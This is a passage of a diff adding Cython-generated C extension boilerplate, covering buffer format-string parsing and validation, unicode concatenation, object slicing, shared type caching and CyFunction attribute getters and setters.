field->type->fields; + ++ctx->head; + ctx->head->field = field; + ctx->head->parent_offset = parent_offset; + break; + } else { + break; + } + } + } while (ctx->enc_count); + ctx->enc_type = 0; + ctx->is_complex = 0; + return 0; +} +static PyObject * +__pyx_buffmt_parse_array(__Pyx_BufFmt_Context* ctx, const char** tsp) +{ + const char *ts = *tsp; + int i = 0, number, ndim; + ++ts; + if (ctx->new_count != 1) { + PyErr_SetString(PyExc_ValueError, + "Cannot handle repeated arrays in format string"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ndim = ctx->head->field->type->ndim; + while (*ts && *ts != ')') { + switch (*ts) { + case ' ': case '\f': case '\r': case '\n': case '\t': case '\v': continue; + default: break; + } + number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + if (i < ndim && (size_t) number != ctx->head->field->type->arraysize[i]) + return PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %d", + ctx->head->field->type->arraysize[i], number); + if (*ts != ',' && *ts != ')') + return PyErr_Format(PyExc_ValueError, + "Expected a comma in format string, got '%c'", *ts); + if (*ts == ',') ts++; + i++; + } + if (i != ndim) + return PyErr_Format(PyExc_ValueError, "Expected %d dimension(s), got %d", + ctx->head->field->type->ndim, i); + if (!*ts) { + PyErr_SetString(PyExc_ValueError, + "Unexpected end of format string, expected ')'"); + return NULL; + } + ctx->is_valid_array = 1; + ctx->new_count = 1; + *tsp = ++ts; + return Py_None; +} +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts) { + int got_Z = 0; + while (1) { + switch(*ts) { + case 0: + if (ctx->enc_type != 0 && ctx->head == NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + if (ctx->head != NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + return ts; + case ' ': + case '\r': + case '\n': + ++ts; + break; + case '<': + if (!__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Little-endian buffer not supported on big-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '>': + case '!': + if (__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Big-endian buffer not supported on little-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '=': + case '@': + case '^': + ctx->new_packmode = *ts++; + break; + case 'T': + { + const char* ts_after_sub; + size_t i, struct_count = ctx->new_count; + size_t struct_alignment = ctx->struct_alignment; + ctx->new_count = 1; + ++ts; + if (*ts != '{') { + PyErr_SetString(PyExc_ValueError, "Buffer acquisition: Expected '{' after 'T'"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + ctx->enc_count = 0; + ctx->struct_alignment = 0; + ++ts; + ts_after_sub = ts; + for (i = 0; i != struct_count; ++i) { + ts_after_sub = __Pyx_BufFmt_CheckString(ctx, ts); + if (!ts_after_sub) return NULL; + } + ts = ts_after_sub; + if (struct_alignment) ctx->struct_alignment = struct_alignment; + } + break; + case '}': + { + size_t alignment = ctx->struct_alignment; + ++ts; + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + if (alignment && ctx->fmt_offset % alignment) { + ctx->fmt_offset += alignment - (ctx->fmt_offset % alignment); + } + } + return ts; + case 'x': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->fmt_offset += ctx->new_count; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->enc_packmode = ctx->new_packmode; + ++ts; + break; + case 'Z': + got_Z = 1; + ++ts; + if (*ts != 'f' && *ts != 'd' && *ts != 'g') { + __Pyx_BufFmt_RaiseUnexpectedChar('Z'); + return NULL; + } + CYTHON_FALLTHROUGH; + case '?': case 'c': case 'b': case 'B': case 'h': case 'H': case 'i': case 'I': + case 'l': case 'L': case 'q': case 'Q': + case 'f': case 'd': case 'g': + case 'O': case 'p': + if ((ctx->enc_type == *ts) && (got_Z == ctx->is_complex) && + (ctx->enc_packmode == ctx->new_packmode) && (!ctx->is_valid_array)) { + ctx->enc_count += ctx->new_count; + ctx->new_count = 1; + got_Z = 0; + ++ts; + break; + } + CYTHON_FALLTHROUGH; + case 's': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_count = ctx->new_count; + ctx->enc_packmode = ctx->new_packmode; + ctx->enc_type = *ts; + ctx->is_complex = got_Z; + ++ts; + ctx->new_count = 1; + got_Z = 0; + break; + case ':': + ++ts; + while(*ts != ':') ++ts; + ++ts; + break; + case '(': + if (!__pyx_buffmt_parse_array(ctx, &ts)) return NULL; + break; + default: + { + int number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + ctx->new_count = (size_t)number; + } + } + } +} + +/* BufferGetAndValidate */ + static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info) { + if (unlikely(info->buf == NULL)) return; + if (info->suboffsets == __Pyx_minusones) info->suboffsets = NULL; + __Pyx_ReleaseBuffer(info); +} +static void __Pyx_ZeroBuffer(Py_buffer* buf) { + buf->buf = NULL; + buf->obj = NULL; + buf->strides = __Pyx_zeros; + buf->shape = __Pyx_zeros; + buf->suboffsets = __Pyx_minusones; +} +static int __Pyx__GetBufferAndValidate( + Py_buffer* buf, PyObject* obj, __Pyx_TypeInfo* dtype, int flags, + int nd, int cast, __Pyx_BufFmt_StackElem* stack) +{ + buf->buf = NULL; + if (unlikely(__Pyx_GetBuffer(obj, buf, flags) == -1)) { + __Pyx_ZeroBuffer(buf); + return -1; + } + if (unlikely(buf->ndim != nd)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + nd, buf->ndim); + goto fail; + } + if (!cast) { + __Pyx_BufFmt_Context ctx; + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (!__Pyx_BufFmt_CheckString(&ctx, buf->format)) goto fail; + } + if (unlikely((size_t)buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "d byte%s) does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "d byte%s)", + buf->itemsize, (buf->itemsize > 1) ? "s" : "", + dtype->name, (Py_ssize_t)dtype->size, (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->suboffsets == NULL) buf->suboffsets = __Pyx_minusones; + return 0; +fail:; + __Pyx_SafeReleaseBuffer(buf); + return -1; +} + +/* UnicodeConcatInPlace */ + # if CYTHON_COMPILING_IN_CPYTHON && PY_MAJOR_VERSION >= 3 +static int +__Pyx_unicode_modifiable(PyObject *unicode) +{ + if (Py_REFCNT(unicode) != 1) + return 0; + if (!PyUnicode_CheckExact(unicode)) + return 0; + if (PyUnicode_CHECK_INTERNED(unicode)) + return 0; + return 1; +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_ConcatInPlaceImpl(PyObject **p_left, PyObject *right + #if CYTHON_REFNANNY + , void* __pyx_refnanny + #endif + ) { + PyObject *left = *p_left; + Py_ssize_t left_len, right_len, new_len; + if (unlikely(__Pyx_PyUnicode_READY(left) == -1)) + return NULL; + if (unlikely(__Pyx_PyUnicode_READY(right) == -1)) + return NULL; + left_len = PyUnicode_GET_LENGTH(left); + if (left_len == 0) { + Py_INCREF(right); + return right; + } + right_len = PyUnicode_GET_LENGTH(right); + if (right_len == 0) { + Py_INCREF(left); + return left; + } + if (unlikely(left_len > PY_SSIZE_T_MAX - right_len)) { + PyErr_SetString(PyExc_OverflowError, + "strings are too large to concat"); + return NULL; + } + new_len = left_len + right_len; + if (__Pyx_unicode_modifiable(left) + && PyUnicode_CheckExact(right) + && PyUnicode_KIND(right) <= PyUnicode_KIND(left) + && !(PyUnicode_IS_ASCII(left) && !PyUnicode_IS_ASCII(right))) { + __Pyx_GIVEREF(*p_left); + if (unlikely(PyUnicode_Resize(p_left, new_len) != 0)) { + __Pyx_GOTREF(*p_left); + return NULL; + } + __Pyx_INCREF(*p_left); + _PyUnicode_FastCopyCharacters(*p_left, left_len, right, 0, right_len); + return *p_left; + } else { + return __Pyx_PyUnicode_Concat(left, right); + } + } +#endif + +/* SliceObject */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_GetSlice(PyObject* obj, + Py_ssize_t cstart, Py_ssize_t cstop, + PyObject** _py_start, PyObject** _py_stop, PyObject** _py_slice, + int has_cstart, int has_cstop, int wraparound) { + __Pyx_TypeName obj_type_name; +#if CYTHON_USE_TYPE_SLOTS + PyMappingMethods* mp; +#if PY_MAJOR_VERSION < 3 + PySequenceMethods* ms = Py_TYPE(obj)->tp_as_sequence; + if (likely(ms && ms->sq_slice)) { + if (!has_cstart) { + if (_py_start && (*_py_start != Py_None)) { + cstart = __Pyx_PyIndex_AsSsize_t(*_py_start); + if ((cstart == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; + } else + cstart = 0; + } + if (!has_cstop) { + if (_py_stop && (*_py_stop != Py_None)) { + cstop = __Pyx_PyIndex_AsSsize_t(*_py_stop); + if ((cstop == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; + } else + cstop = PY_SSIZE_T_MAX; + } + if (wraparound && unlikely((cstart < 0) | (cstop < 0)) && likely(ms->sq_length)) { + Py_ssize_t l = ms->sq_length(obj); + if (likely(l >= 0)) { + if (cstop < 0) { + cstop += l; + if (cstop < 0) cstop = 0; + } + if (cstart < 0) { + cstart += l; + if (cstart < 0) cstart = 0; + } + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + goto bad; + PyErr_Clear(); + } + } + return ms->sq_slice(obj, cstart, cstop); + } +#else + CYTHON_UNUSED_VAR(wraparound); +#endif + mp = Py_TYPE(obj)->tp_as_mapping; + if (likely(mp && mp->mp_subscript)) +#else + CYTHON_UNUSED_VAR(wraparound); +#endif + { + PyObject* result; + PyObject *py_slice, *py_start, *py_stop; + if (_py_slice) { + py_slice = *_py_slice; + } else { + PyObject* owned_start = NULL; + PyObject* owned_stop = NULL; + if (_py_start) { + py_start = *_py_start; + } else { + if (has_cstart) { + owned_start = py_start = PyInt_FromSsize_t(cstart); + if (unlikely(!py_start)) goto bad; + } else + py_start = Py_None; + } + if (_py_stop) { + py_stop = *_py_stop; + } else { + if (has_cstop) { + owned_stop = py_stop = PyInt_FromSsize_t(cstop); + if (unlikely(!py_stop)) { + Py_XDECREF(owned_start); + goto bad; + } + } else + py_stop = Py_None; + } + py_slice = PySlice_New(py_start, py_stop, Py_None); + Py_XDECREF(owned_start); + Py_XDECREF(owned_stop); + if (unlikely(!py_slice)) goto bad; + } +#if CYTHON_USE_TYPE_SLOTS + result = mp->mp_subscript(obj, py_slice); +#else + result = PyObject_GetItem(obj, py_slice); +#endif + if (!_py_slice) { + Py_DECREF(py_slice); + } + return result; + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is unsliceable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); +bad: + return NULL; +} + +/* PyObjectLookupSpecial */ + #if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error) { + PyObject *res; + PyTypeObject *tp = Py_TYPE(obj); +#if PY_MAJOR_VERSION < 3 + if (unlikely(PyInstance_Check(obj))) + return with_error ? __Pyx_PyObject_GetAttrStr(obj, attr_name) : __Pyx_PyObject_GetAttrStrNoError(obj, attr_name); +#endif + res = _PyType_Lookup(tp, attr_name); + if (likely(res)) { + descrgetfunc f = Py_TYPE(res)->tp_descr_get; + if (!f) { + Py_INCREF(res); + } else { + res = f(res, obj, (PyObject *)tp); + } + } else if (with_error) { + PyErr_SetObject(PyExc_AttributeError, attr_name); + } + return res; +} +#endif + +/* FixUpExtensionType */ + #if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* FetchSharedCythonModule */ + static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ + static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ + #if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ + static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", 